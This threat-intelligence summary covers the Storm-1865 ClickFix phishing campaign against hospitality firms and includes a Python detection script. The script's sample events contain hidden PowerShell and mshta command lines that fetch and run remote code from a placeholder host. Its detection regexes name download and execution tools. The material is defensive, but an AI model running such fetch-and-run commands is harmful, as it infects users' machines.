Microsoft said the ongoing phishing campaign is designed to infect hospitality firms with multiple credential-stealing malware
# Tool/Technique: ClickFix Phishing Campaign
## Overview
Storm-1865, a threat cluster tracked by Microsoft, is running a sophisticated, ongoing phishing campaign that impersonates Booking.com to target hospitality organizations worldwide. The campaign uses the "ClickFix" social engineering technique to trick users into running commands that download malware, with the primary goal of stealing financial data and credentials for fraud.
## Technical Details
- Type: Technique/Campaign (utilizing various malware families)
- Platform: General (Social engineering targeting users interacting with booking systems)
- Capabilities: Social engineering to bypass standard security measures by enlisting user action (self-infection); deployment of multiple infostealers and RATs.
- First Seen: December 2024
## MITRE ATT&CK Mapping
Given the nature of the campaign involving deception leading to user execution of malicious commands and subsequent malware payload delivery:
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (likely attachments or links leading to execution)
- **TA0002 - Execution**
  - T1204 - User Execution
    - T1204.002 - Malicious File
    - T1204.001 - Malicious Link (where the lure delivers a link rather than a file)
## Functionality
### Core Capabilities
- **Impersonation:** Posing as Booking.com to establish trust with hospitality sector employees.
- **ClickFix Social Engineering:** Presenting a fake error message (for example, a spurious copy/paste or display error) that instructs the user to copy, paste, and launch specific terminal commands to "fix" the problem.
- **Self-Infection:** The user executes the malicious commands themselves, which sidesteps automated controls that look for execution the user did not initiate.
### Advanced Features
- **Multi-Malware Deployment:** The campaign deploys several distinct malware families in succession or based on initial success, increasing the likelihood of data exfiltration.
- **Targeted Sector Focus:** Specifically targets hospitality firms likely engaged with Booking.com in North America, Oceania, South and Southeast Asia, and Europe.
## Indicators of Compromise
*Note: The provided text focuses on the technique and associated malware families rather than specific IOCs like hashes or C2 addresses for this specific incident.*
- File Hashes: [Not specified in text]
- File Names: [Not specified in text]
- Registry Keys: [Not specified in text]
- Network Indicators: [Not specified in text, but expected C2 infrastructure for deployed malware]
- Behavioral Indicators: User prompted to copy/paste and execute commands from a fraudulent message; subsequent execution of downloaded malware (XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, NetSup).
## Associated Threat Actors
- Storm-1865 (Attributed by Microsoft Threat Intelligence)
## Detection Methods
- Signature-based detection (for known malware payloads deployed)
- Behavioral detection (monitoring for standard users launching command interpreters with commands pasted from a web page or email, especially command lines that fetch and run remote content)
- YARA rules (for known malware payloads deployed)
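The behavioral detection above can be expressed as a small scoring rule over process-creation telemetry. The following is an added example written for this summary, not tooling from Microsoft's report: it flags a command interpreter that a user launched interactively (parent `explorer.exe`) with a command line that pulls remote content or hides its window. The event records, paths, user names and `example.invalid` URLs are constructed sample data, and the two-of-three threshold is an assumption a team would tune against its own baseline.

```python
"""Behavioral detection for ClickFix-style self-infection.

Scans process-creation events for a command interpreter that a user launched
interactively (parent explorer.exe) with a command line that fetches and runs
remote content. Added example with constructed sample events; nothing here is
taken from the Microsoft report.
"""
import re
from dataclasses import dataclass

# Interpreters typically used to run a pasted "fix" command.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# A user-driven launch (Run dialog, File Explorer) shows up with this parent.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Signal 2: the command line reaches out to fetch something.
REMOTE_FETCH = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"\bcurl\b|\bwget\b", re.I)
# Signal 3: the command line evaluates fetched code or hides the console.
EXEC_OR_HIDE = re.compile(
    r"\biex\b|invoke-expression|-enc(?:odedcommand)?\b|"
    r"-w(?:indowstyle)?\s+hidden|\bbypass\b", re.I)


@dataclass
class ProcEvent:
    event_id: int
    user: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent):
    """Return (score, reasons); each matched signal adds one point."""
    reasons = []
    if basename(ev.image) not in INTERPRETERS:
        return 0, reasons
    if basename(ev.parent_image) in INTERACTIVE_PARENTS:
        reasons.append("interpreter launched interactively from explorer.exe")
    if REMOTE_FETCH.search(ev.cmdline):
        reasons.append("command line fetches remote content")
    if EXEC_OR_HIDE.search(ev.cmdline):
        reasons.append("command line evaluates code or hides its window")
    return len(reasons), reasons


def detect_clickfix(events, threshold: int = 2):
    """Alert on events reaching the threshold (assumed: 2 of 3 signals)."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"event_id": ev.event_id, "user": ev.user,
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample telemetry (not real hosts, users or URLs).
SAMPLE_EVENTS = [
    # benign: admin runs a local script from a terminal, no network
    ProcEvent(1, "CORP\\admin",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsTerminal.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),
    # benign: user opens cmd from Explorer for a local diagnostic
    ProcEvent(2, "CORP\\frontdesk", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\explorer.exe", "cmd.exe /c ipconfig /all"),
    # ClickFix pattern: hidden PowerShell window pulling and running a remote script
    ProcEvent(3, "CORP\\frontdesk",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell.exe -w hidden -c "iex (iwr http://example.invalid/verify)"'),
    # ClickFix variant: mshta handed a URL directly
    ProcEvent(4, "CORP\\reservations", r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\explorer.exe", "mshta.exe https://example.invalid/fix"),
    # not an interpreter: browser visiting the real booking site
    ProcEvent(5, "CORP\\frontdesk",
              r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r"C:\Windows\explorer.exe", "firefox.exe https://www.booking.com/"),
]

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

Events 3 and 4 are the only ones that reach the threshold; event 2 (a user launching `cmd.exe` from Explorer with no network activity) scores one point and stays below it, which is the reason for combining signals rather than alerting on the interactive parent alone. In production the same logic maps onto EDR or Sysmon process-creation events, and the interpreter and parent sets should be extended with whatever the environment's baseline shows.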
## Mitigation Strategies
- **User Training:** Aggressive training on recognizing sophisticated social engineering, especially the "fix-it" instinct that leads users to follow on-screen instructions instead of reporting the message.
- **Execution Policy Enforcement:** Restrict or monitor the execution of commands pasted directly into command-line interfaces by standard users.
- **Endpoint Detection and Response (EDR):** Implement EDR capable of detecting suspicious command-line activity or the download/execution chain associated with infostealer deployment.
- **Email Filtering:** Ensure robust email gateway filtering to catch phishing attempts mimicking high-trust domains like Booking.com.
## Related Tools/Techniques
- **Malware Families Deployed:** XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, NetSup.
- **Technique Precedent:** Phishing techniques that rely on user execution of malicious scripts or commands (e.g., malicious macro execution, HTML smuggling leading to script execution).